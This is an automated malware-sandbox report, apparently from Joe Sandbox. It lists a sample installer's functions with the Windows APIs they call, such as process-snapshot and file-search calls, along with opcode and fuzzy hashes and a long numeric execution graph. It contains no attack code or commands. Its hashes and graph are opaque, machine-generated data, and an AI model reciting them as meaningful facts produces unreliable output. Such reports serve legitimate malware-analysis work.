                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                  • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                  • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                  • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                  Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                  • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                  • String ID:
                                                                                  • API String ID: 2883127279-0
                                                                                  • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                  • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                  • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                  • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                  Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                  • String ID: HideWindow
                                                                                  • API String ID: 1249568736-780306582
                                                                                  • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                  • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                                  • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                                  • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                                  Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                  • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: PrivateProfileStringlstrcmp
                                                                                  • String ID: !N~
                                                                                  • API String ID: 623250636-529124213
                                                                                  • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                  • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                  • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                  • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                  Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                  • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                  Strings
                                                                                  • Error launching installer, xrefs: 00405C48
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID: Error launching installer
                                                                                  • API String ID: 3712363035-66219284
                                                                                  • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                  • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                  • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                  • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                  Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                  • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                    • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandlelstrlenwvsprintf
                                                                                  • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                  • API String ID: 3509786178-2769509956
                                                                                  • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                  • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                  • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                  • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                  Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                  • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                  • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                  • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2100845376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2100828574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100866646.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2100900333.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2101006006.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                  • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                  • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                  • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                  Execution Graph

                                                                                  Execution Coverage:4.1%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:2.1%
                                                                                  Total number of Nodes:2000
                                                                                  Total number of Limit Nodes:118
                                                                                  execution_graph 98029 a89a88 98032 a886e0 98029->98032 98033 a886fd 98032->98033 98034 ac0fad 98033->98034 98035 ac0ff8 98033->98035 98054 a88724 98033->98054 98038 ac0fb5 98034->98038 98042 ac0fc2 98034->98042 98034->98054 98107 afaad0 277 API calls __cinit 98035->98107 98105 afb0e4 277 API calls 98038->98105 98057 a8898d 98042->98057 98106 afb58c 277 API calls 3 library calls 98042->98106 98043 ac1289 98043->98043 98045 ac11af 98117 afae3b 89 API calls 98045->98117 98048 a88a17 98053 a83f42 68 API calls 98053->98054 98054->98045 98054->98048 98054->98053 98056 a83c30 68 API calls 98054->98056 98054->98057 98061 a853b0 98054->98061 98089 a839be 98054->98089 98093 a83938 68 API calls 98054->98093 98094 a8855e 277 API calls 98054->98094 98095 a85278 98054->98095 98100 aa2f70 98054->98100 98103 a884e2 89 API calls 98054->98103 98104 a8835f 277 API calls 98054->98104 98108 a8523c 98054->98108 98112 ad73ab 59 API calls 98054->98112 98113 a91c9c 98054->98113 98056->98054 98057->98048 98118 aea48d 89 API calls 4 library calls 98057->98118 98062 a853cf 98061->98062 98081 a853fd Mailbox 98061->98081 98195 aa0fe6 98062->98195 98064 a869fa 98066 a91c9c 59 API calls 98064->98066 98065 a869ff 98068 abe691 98065->98068 98069 abf165 98065->98069 98074 a85569 Mailbox 98066->98074 98067 aa0fe6 59 API calls Mailbox 98067->98081 98205 aea48d 89 API calls 4 library calls 98068->98205 98209 aea48d 89 API calls 4 library calls 98069->98209 98070 a91207 59 API calls 98070->98081 98074->98054 98075 abe6a0 98075->98054 98076 a91c9c 59 API calls 98076->98081 98077 abea9a 98080 a91c9c 59 API calls 98077->98080 98080->98074 98081->98064 98081->98065 98081->98067 98081->98068 98081->98070 98081->98074 98081->98076 98081->98077 98082 abeb67 98081->98082 98083 aa2f70 67 API calls __cinit 98081->98083 98084 ad7aad 59 API calls 98081->98084 98086 abef28 98081->98086 98088 a85a1a 98081->98088 98119 a87e50 98081->98119 98178 a86e30 98081->98178 98082->98074 98206 ad7aad 59 API calls 98082->98206 98083->98081 98084->98081 98207 aea48d 89 API calls 4 library calls 98086->98207 98208 aea48d 89 API calls 4 library calls 98088->98208 98090 a839c9 98089->98090 98091 a83ea3 68 API calls 98090->98091 98092 a839f0 98090->98092 98091->98092 98092->98054 98093->98054 98094->98054 98096 aa0fe6 Mailbox 59 API calls 98095->98096 98097 a85285 98096->98097 98098 a85294 98097->98098 98099 a91a36 59 API calls 98097->98099 98098->98054 98099->98098 99115 aa2e74 98100->99115 98102 aa2f7b 98102->98054 98103->98054 98104->98054 98105->98042 98106->98057 98107->98054 98109 a8524a 98108->98109 98110 a85250 98108->98110 98109->98110 98111 a91c9c 59 API calls 98109->98111 98110->98054 98111->98110 98112->98054 98114 a91caf 98113->98114 98115 a91ca7 98113->98115 98114->98054 98116 a91bcc 59 API calls 98115->98116 98116->98114 98117->98057 98118->98043 98120 a87e79 98119->98120 98135 a87ef2 98119->98135 98121 ac0adf 98120->98121 98123 a87e90 98120->98123 98128 ac0b09 98120->98128 98216 afcdc8 277 API calls 2 library calls 98121->98216 98122 ac0ad3 98215 aea48d 89 API calls 4 library calls 98122->98215 98129 ac0c37 98123->98129 98138 a87ea1 98123->98138 98147 a87eb8 Mailbox 98123->98147 98127 a853b0 277 API calls 98127->98135 98133 ac0b3d 98128->98133 98136 ac0b21 98128->98136 98134 a91c9c 59 API calls 98129->98134 98130 ac09e1 98213 a85190 59 API calls Mailbox 98130->98213 98131 a8806a 98131->98081 98133->98121 98218 afa8fd 98133->98218 98134->98147 98135->98127 98135->98130 98135->98131 98154 a88015 98135->98154 98161 a87fb2 98135->98161 98176 ac09e9 98135->98176 98217 aea48d 89 API calls 4 library calls 98136->98217 98138->98147 98289 ad7aad 59 API calls 98138->98289 98139 ac0d0b 98145 ac0d41 98139->98145 98309 afc9c9 95 API calls Mailbox 98139->98309 98141 ac0a33 98144 a91c9c 59 API calls 98141->98144 98144->98147 98149 a8523c 59 API calls 98145->98149 98146 ac0bb7 98245 ae7ed5 59 API calls 98146->98245 98147->98139 98153 a87ee7 98147->98153 98290 afc87c 85 API calls 2 library calls 98147->98290 98149->98153 98151 ac0ce9 98291 a84d37 98151->98291 98153->98081 98166 a88022 Mailbox 98154->98166 98212 aea48d 89 API calls 4 library calls 98154->98212 98156 ac0d1f 98159 a84d37 84 API calls 98156->98159 98157 ac0b6b 98225 ae789a 98157->98225 98170 ac0d27 __NMSG_WRITE 98159->98170 98160 ac0bc9 98246 a935b9 59 API calls Mailbox 98160->98246 98161->98154 98210 a84230 59 API calls Mailbox 98161->98210 98166->98141 98166->98147 98211 ad7aad 59 API calls 98166->98211 98167 ac0bd2 Mailbox 98174 ae789a 59 API calls 98167->98174 98169 ac0cf1 __NMSG_WRITE 98169->98139 98172 a8523c 59 API calls 98169->98172 98170->98145 98173 a8523c 59 API calls 98170->98173 98172->98139 98173->98145 98175 ac0beb 98174->98175 98247 a8b020 98175->98247 98176->98122 98176->98147 98176->98166 98214 afccac 277 API calls 98176->98214 98179 a86e4a 98178->98179 98181 a86ff7 98178->98181 98180 a874d0 98179->98180 98179->98181 98183 a86f2c 98179->98183 98186 a86fdb 98179->98186 98180->98186 99086 a849e0 59 API calls wcstoxq 98180->99086 98181->98180 98181->98186 98189 a86fbb Mailbox 98181->98189 98191 a87076 98181->98191 98183->98186 98188 a86f68 98183->98188 98183->98191 98185 abfc1e 98190 abfc30 98185->98190 99084 aa3f69 59 API calls __wtof_l 98185->99084 98186->98081 98188->98186 98188->98189 98194 abfa71 98188->98194 98189->98185 98189->98186 99085 a841c4 59 API calls Mailbox 98189->99085 98190->98081 98191->98185 98191->98186 98191->98189 99083 ad7aad 59 API calls 98191->99083 98194->98186 99082 aa3f69 59 API calls __wtof_l 98194->99082 98198 aa0fee 98195->98198 98197 aa1008 98197->98081 98198->98197 98200 aa100c std::exception::exception 98198->98200 99087 aa593c 98198->99087 99104 aa35d1 DecodePointer 98198->99104 99105 aa87cb RaiseException 98200->99105 98202 aa1036 99106 aa8701 58 API calls _free 98202->99106 98204 aa1048 98204->98081 98205->98075 98206->98074 98207->98088 98208->98074 98209->98074 98210->98154 98211->98166 98212->98130 98213->98176 98214->98176 98215->98121 98216->98147 98217->98153 98219 afa918 98218->98219 98220 ac0b53 98218->98220 98221 aa0fe6 Mailbox 59 API calls 98219->98221 98220->98146 98220->98157 98224 afa93a 98221->98224 98222 aa0fe6 Mailbox 59 API calls 98222->98224 98224->98220 98224->98222 98310 ad715b 59 API calls Mailbox 98224->98310 98226 ae78ac 98225->98226 98228 ac0b8d 98225->98228 98227 aa0fe6 Mailbox 59 API calls 98226->98227 98226->98228 98227->98228 98229 ad6ebc 98228->98229 98230 ad6f06 98229->98230 98235 ad6f1c Mailbox 98229->98235 98334 a91a36 98230->98334 98231 ad6f5a 98311 a8a820 98231->98311 98232 ad6f47 98338 afc355 98232->98338 98235->98231 98235->98232 98238 ad7002 98238->98176 98239 ad6f91 98240 ad6fdc 98239->98240 98241 ad6f53 98239->98241 98243 ad6fc1 98239->98243 98240->98241 98378 aea48d 89 API calls 4 library calls 98240->98378 98379 ad6cf1 59 API calls Mailbox 98241->98379 98328 ad706d 98243->98328 98245->98160 98246->98167 98534 a93740 98247->98534 98250 ac30b6 98638 aea48d 89 API calls 4 library calls 98250->98638 98252 a8b07f 98252->98250 98253 ac30d4 98252->98253 98269 a8bb86 98252->98269 98270 a8b132 Mailbox _memmove 98252->98270 98639 aea48d 89 API calls 4 library calls 98253->98639 98255 ac355e 98288 a8b4dd 98255->98288 98665 aea48d 89 API calls 4 library calls 98255->98665 98256 ac318a 98256->98288 98641 aea48d 89 API calls 4 library calls 98256->98641 98257 ac3106 98257->98256 98640 a8a9de 277 API calls 98257->98640 98264 a853b0 277 API calls 98264->98270 98265 a83b31 59 API calls 98265->98270 98266 ad730a 59 API calls 98266->98270 98637 aea48d 89 API calls 4 library calls 98269->98637 98270->98255 98270->98257 98270->98264 98270->98265 98270->98266 98270->98269 98276 ac31c3 98270->98276 98277 a83c30 68 API calls 98270->98277 98279 ac346f 98270->98279 98282 a8523c 59 API calls 98270->98282 98284 a91c9c 59 API calls 98270->98284 98285 ac3418 98270->98285 98286 aa0fe6 59 API calls Mailbox 98270->98286 98270->98288 98539 a83add 98270->98539 98546 a8bc70 98270->98546 98625 a83a40 98270->98625 98636 a85190 59 API calls Mailbox 98270->98636 98643 ad6c62 59 API calls 2 library calls 98270->98643 98644 afa9c3 85 API calls Mailbox 98270->98644 98645 ad6c1e 59 API calls Mailbox 98270->98645 98646 ae5ef2 68 API calls 98270->98646 98647 a83ea3 98270->98647 98664 aea12a 59 API calls 98270->98664 98271 a853b0 277 API calls 98273 ac3448 98271->98273 98278 a839be 68 API calls 98273->98278 98273->98288 98642 aea48d 89 API calls 4 library calls 98276->98642 98277->98270 98278->98279 98663 aea48d 89 API calls 4 library calls 98279->98663 98282->98270 98284->98270 98285->98271 98286->98270 98288->98176 98289->98147 98290->98151 98292 a84d51 98291->98292 98301 a84d4b 98291->98301 98293 a84d99 98292->98293 98294 a84d57 __itow 98292->98294 98295 abdb28 __i64tow 98292->98295 98299 abda2f 98292->98299 99080 aa38c8 83 API calls 3 library calls 98293->99080 98298 aa0fe6 Mailbox 59 API calls 98294->98298 98300 a84d71 98298->98300 98302 aa0fe6 Mailbox 59 API calls 98299->98302 98307 abdaa7 Mailbox _wcscpy 98299->98307 98300->98301 98303 a91a36 59 API calls 98300->98303 98301->98169 98305 abda74 98302->98305 98303->98301 98304 aa0fe6 Mailbox 59 API calls 98306 abda9a 98304->98306 98305->98304 98306->98307 98308 a91a36 59 API calls 98306->98308 99081 aa38c8 83 API calls 3 library calls 98307->99081 98308->98307 98309->98156 98310->98224 98312 ac2d51 98311->98312 98315 a8a84c 98311->98315 98381 aea48d 89 API calls 4 library calls 98312->98381 98314 ac2d62 98314->98239 98316 ac2d6a 98315->98316 98322 a8a888 _memmove 98315->98322 98382 aea48d 89 API calls 4 library calls 98316->98382 98318 a8a975 98318->98239 98320 aa0fe6 59 API calls Mailbox 98320->98322 98321 ac2dae 98383 a8a9de 277 API calls 98321->98383 98322->98318 98322->98320 98322->98321 98324 a853b0 277 API calls 98322->98324 98325 ac2dc8 98322->98325 98327 a8a962 98322->98327 98324->98322 98325->98318 98384 aea48d 89 API calls 4 library calls 98325->98384 98327->98318 98380 afa9c3 85 API calls Mailbox 98327->98380 98329 ad7085 98328->98329 98385 ae413a 98329->98385 98388 af495b 98329->98388 98397 aff1b2 98329->98397 98330 ad70d9 98330->98241 98335 a91a45 __NMSG_WRITE _memmove 98334->98335 98336 aa0fe6 Mailbox 59 API calls 98335->98336 98337 a91a83 98336->98337 98337->98235 98339 afc39a 98338->98339 98340 afc380 98338->98340 98342 afa8fd 59 API calls 98339->98342 98529 aea48d 89 API calls 4 library calls 98340->98529 98343 afc3a5 98342->98343 98344 a853b0 276 API calls 98343->98344 98345 afc406 98344->98345 98346 afc392 Mailbox 98345->98346 98347 afc498 98345->98347 98350 afc447 98345->98350 98346->98241 98348 afc4ee 98347->98348 98349 afc49e 98347->98349 98348->98346 98351 a84d37 84 API calls 98348->98351 98530 ae7ed5 59 API calls 98349->98530 98355 ae789a 59 API calls 98350->98355 98352 afc500 98351->98352 98356 a91aa4 59 API calls 98352->98356 98354 afc4c1 98531 a935b9 59 API calls Mailbox 98354->98531 98358 afc477 98355->98358 98359 afc524 CharUpperBuffW 98356->98359 98361 ad6ebc 276 API calls 98358->98361 98362 afc53e 98359->98362 98360 afc4c9 Mailbox 98365 a8b020 276 API calls 98360->98365 98361->98346 98363 afc545 98362->98363 98364 afc591 98362->98364 98368 ae789a 59 API calls 98363->98368 98366 a84d37 84 API calls 98364->98366 98365->98346 98367 afc599 98366->98367 98532 a85376 60 API calls 98367->98532 98370 afc573 98368->98370 98371 ad6ebc 276 API calls 98370->98371 98371->98346 98372 afc5a3 98372->98346 98373 a84d37 84 API calls 98372->98373 98374 afc5be 98373->98374 98533 a935b9 59 API calls Mailbox 98374->98533 98376 afc5ce 98377 a8b020 276 API calls 98376->98377 98377->98346 98378->98241 98379->98238 98380->98318 98381->98314 98382->98318 98383->98325 98384->98318 98402 ae494a GetFileAttributesW 98385->98402 98389 aa0fe6 Mailbox 59 API calls 98388->98389 98390 af496c 98389->98390 98406 a9433f 98390->98406 98393 a84d37 84 API calls 98394 af498d GetEnvironmentVariableW 98393->98394 98409 ae7a51 59 API calls Mailbox 98394->98409 98396 af49aa 98396->98330 98398 a84d37 84 API calls 98397->98398 98399 aff1cf 98398->98399 98410 ae4148 CreateToolhelp32Snapshot Process32FirstW 98399->98410 98401 aff1de 98401->98330 98403 ae4965 FindFirstFileW 98402->98403 98405 ae413f 98402->98405 98404 ae497a FindClose 98403->98404 98403->98405 98404->98405 98405->98330 98407 aa0fe6 Mailbox 59 API calls 98406->98407 98408 a94351 98407->98408 98408->98393 98409->98396 98420 ae4ce2 98410->98420 98412 ae4244 FindCloseChangeNotification 98412->98401 98413 ae4195 Process32NextW 98413->98412 98418 ae418e Mailbox 98413->98418 98414 a91207 59 API calls 98414->98418 98415 a91a36 59 API calls 98415->98418 98418->98412 98418->98413 98418->98414 98418->98415 98426 aa0119 98418->98426 98477 a917e0 59 API calls Mailbox 98418->98477 98478 a9151f 61 API calls 98418->98478 98421 ae4d09 98420->98421 98422 ae4cf0 98420->98422 98480 aa37c3 59 API calls __wcstoi64 98421->98480 98422->98421 98425 ae4d0f 98422->98425 98479 aa385c GetStringTypeW _iswctype 98422->98479 98425->98418 98481 a91207 98426->98481 98429 a91207 59 API calls 98430 aa0137 98429->98430 98431 a91207 59 API calls 98430->98431 98432 aa013f 98431->98432 98433 a91207 59 API calls 98432->98433 98434 aa0147 98433->98434 98435 ad627d 98434->98435 98436 aa017b 98434->98436 98437 a91c9c 59 API calls 98435->98437 98438 a91462 59 API calls 98436->98438 98439 ad6286 98437->98439 98440 aa0189 98438->98440 98506 a919e1 98439->98506 98499 a91981 98440->98499 98443 aa0193 98445 aa01be 98443->98445 98446 a91462 59 API calls 98443->98446 98444 aa01fe 98486 a91462 98444->98486 98445->98444 98448 aa01dd 98445->98448 98458 ad62a6 98445->98458 98449 aa01b4 98446->98449 98503 a91609 98448->98503 98451 a91981 59 API calls 98449->98451 98450 ad6376 98454 a91821 59 API calls 98450->98454 98451->98445 98453 aa020f 98456 aa0221 98453->98456 98459 a91c9c 59 API calls 98453->98459 98472 ad6333 98454->98472 98457 aa0231 98456->98457 98460 a91c9c 59 API calls 98456->98460 98462 aa0238 98457->98462 98464 a91c9c 59 API calls 98457->98464 98458->98450 98461 ad635f 98458->98461 98470 ad62dd 98458->98470 98459->98456 98460->98457 98461->98450 98466 ad634a 98461->98466 98465 a91c9c 59 API calls 98462->98465 98474 aa023f Mailbox 98462->98474 98463 a91462 59 API calls 98463->98444 98464->98462 98465->98474 98469 a91821 59 API calls 98466->98469 98467 ad633b 98468 a91821 59 API calls 98467->98468 98468->98472 98469->98472 98470->98467 98475 ad6326 98470->98475 98471 a91609 59 API calls 98471->98472 98472->98444 98472->98471 98519 a9153b 59 API calls 2 library calls 98472->98519 98474->98418 98510 a91821 98475->98510 98477->98418 98478->98418 98479->98422 98480->98425 98482 aa0fe6 Mailbox 59 API calls 98481->98482 98483 a91228 98482->98483 98484 aa0fe6 